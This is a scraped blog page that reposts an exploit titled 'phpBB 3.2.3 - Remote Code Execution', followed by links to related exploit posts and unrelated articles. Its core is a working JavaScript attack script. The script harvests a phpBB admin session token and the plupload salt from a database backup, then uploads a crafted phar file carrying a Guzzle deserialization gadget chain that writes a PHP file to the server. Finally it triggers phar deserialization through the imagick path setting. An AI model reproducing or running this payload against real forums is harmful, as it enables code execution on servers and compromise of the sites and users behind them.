[EXP]phpBB 3.2.3 - Remote Code Execution
// All greets goes to RIPS Tech
// Run this JS on Attachment Settings ACP page
var plupload_salt = '';
var form_token = '';
var creation_time = '';
var filepath = 'phar://./../files/plupload/$salt_aaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5('evil.zip') = aaae9cba5fdadb1f0c384934cd20d11czip
// your payload here
var payload = '<?php __HALT_COMPILER(); ?>\x0d\x0a\xfe\x01\x00\x00\x01\x00\x00\x00\x11\x00\x00\x00\x01'+'\x00'.repeat(5)+'\xc8\x01\x00\x00O:31:"GuzzleHttp\x5cCookie\x5cFileCookieJar":4:{s:41:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00filename";s:30:"/var/www/html/phpBB3/pinfo.php";s:52:"\x00GuzzleHttp\x5cCookie\x5cFileCookieJar\x00storeSessionCookies";b:1;s:36:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00cookies";a:1:{i:0;O:27:"GuzzleHttp\x5cCookie\x5cSetCookie":1:{s:33:"\x00GuzzleHttp\x5cCookie\x5cSetCookie\x00data";a:3:{s:7:"Expires";i:1;s:7:"Discard";b:0;s:5:"Value";s:17:"<?php phpinfo();#";}}}s:39:"\x00GuzzleHttp\x5cCookie\x5cCookieJar\x00strictMode";N;}\x08\x00\x00\x00test.txt\x04\x00\x00\x00K>\x10\x5c\x04\x00\x00\x00\x0c~\x7f\xd8\xb6\x01'+'\x00'.repeat(6)+'test\xa0\x17\xd2\xe0R\xcf \xf6T\x1d\x01X\x91(\x9dD]X\x0b>\x02\x00\x00\x00GBMB';
var byteArray = Uint8Array.from(payload, function(c){return c.codePointAt(0);});
var sid = (new URL(document.location.href)).searchParams.get('sid');
var url = '/adm/index.php';
var getparams = {
'i': 'acp_database',
'sid': sid,
'mode': 'backup'
};
$.get(url, getparams, function(data) {
form_token = $(data).find('[name="form_token"]').val();
creation_time = $(data).find('[name="creation_time"]').val();
if(form_token && creation_time) {
var posturl = '/adm/index.php?i=acp_database&sid=|&mode=backup&action=download';
var postdata = {
'type': 'data',
'method': 'text',
'where': 'download',
'table[]': 'phpbb_config',
'submit': 'Submit',
'creation_time': creation_time,
'form_token': form_token
}
$.post(posturl.replace("|", sid), postdata, function (data) {
plupload_salt = data.match(/plupload_salt',\s*'(\w{32})/)[1];
if (plupload_salt) {
filepath = filepath.replace("$salt", plupload_salt);
var postdata = new FormData();
postdata.append('name', 'evil.zip');
postdata.append('chunk', 0);
postdata.append('chunks', 2);
postdata.append('add_file', 'Add the file');
postdata.append('real_filename', 'evil.zip');
// file
var pharfile = new File([byteArray], 'evil.zip');
postdata.append('fileupload', pharfile);
jQuery.ajax({
url: '/posting.php?mode=reply&f=2&t=1',
data: postdata,
cache: false,
contentType: false,
processData: false,
method: 'POST',
success: function(data){
if ("id" in data) {
$('#img_imagick').val(filepath).focus();
$('html, body').animate({
scrollTop: ($('#submit').offset().top)
}, 500);
}
}
}); }
}, 'text');
}
});
[EXP]phpBB 3.2.3 - Remote Code Execution的更多相关文章
- [EXP]Apache Superset < 0.23 - Remote Code Execution
# Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...
- [EXP]WordPress Core 5.0 - Remote Code Execution
var wpnonce = ''; var ajaxnonce = ''; var wp_attached_file = ''; var imgurl = ''; var postajaxdata = ...
- [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution
# Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...
- [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution
# Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...
- CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis
目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...
- MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability
catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...
- Insecure default in Elasticsearch enables remote code execution
Elasticsearch has a flaw in its default configuration which makes it possible for any webpage to exe ...
- Roundcube 1.2.2 - Remote Code Execution
本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...
- Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现
一. Home Web Server 1.9.1 build 164 - CGI Remote Code Execution复现 漏洞描述: Home Web Server允许调用CGI程序来通过P ...
随机推荐
- KO ----- 静态资源404问题
--------------------siwuxie095 KO ----- 静态资源 404 问题 在 Spring ...
- [leetcode]30. Substring with Concatenation of All Words由所有单词连成的子串
You are given a string, s, and a list of words, words, that are all of the same length. Find all sta ...
- linux下安装python,Django,虚拟环境
linux下python安装步骤: 1.下载python3源码包 wget https://www.python.org/ftp/python/3.6.6/Python-3.6.7.tgz 2.下载p ...
- 安装Ubuntu 18.04后的一些操作
安装Ubuntu 18.04后的一些操作 1.设置root密码 sudo passwd 2.登陆root(输入密码后看到井号就是切换成为root账户) su 3.删除预装 apt-get remove ...
- 彻底关闭win10后台同步数据(转自技术社区)
设置隐私里面关闭所有同步数据选项 HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\将下面子项属性修改 OneSyncSvc的start属相修改 ...
- 6E - 寒冰王座
不死族的巫妖王发工资拉,死亡骑士拿到一张N元的钞票(记住,只有一张钞票),为了防止自己在战斗中频繁的死掉,他决定给自己买一些道具,于是他来到了地精商店前. 死亡骑士:"我要买道具!" ...
- leveldb 学习记录(八) compact
随着运行时间的增加,memtable会慢慢 转化成 sstable. sstable会越来越多 我们就需要进行整合 compact 代码会在写入查询key值 db写入时等多出位置调用MaybeSche ...
- Chapter3_操作符_别名机制
Java中的别名机制实际体现的是对于“=”这一类赋值操作符的使用规则和内涵.“=”的实际内涵是指将右边的变量的值(对于基本数据类型而言)或者某一个对象的引用(对于某个具体对象而言)复制到左边的变量名所 ...
- 【轻松前端之旅】<a>元素妙用
浏览器读取服务器内容时,通过URL(包含:协议+域名+绝对路径)如:https://www.baidu.com/index.html浏览器从本地读取内容时,会用file协议.如:file:///E:/ ...
- Maven二
1 回顾 1.1 Maven的好处 节省空间 对jar包做了统一管理 依赖管理 一键构建 可跨平台 应用在大型项目可提高开发效率 1.2 Maven安装部署配置 1.3 Maven的仓库 本地仓库 远 ...